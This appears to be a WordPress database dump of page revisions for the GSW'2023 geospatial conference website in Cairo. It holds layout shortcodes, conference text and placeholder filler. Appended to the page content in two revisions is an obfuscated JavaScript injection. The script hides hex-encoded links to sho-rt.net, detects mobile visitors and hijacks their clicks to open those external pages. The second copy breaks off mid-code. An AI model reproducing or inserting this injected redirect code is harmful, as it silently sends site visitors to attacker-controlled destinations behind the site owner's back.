!important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:50:42','2022-11-09 15:50:42','',3066,'https://gsw2023.com/?p=3148',0,'revision','',0),
(3149,1,'2022-11-09 15:51:38','2022-11-09 15:51:38','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668005485706{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668005400977{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668005634121{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668009039309{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 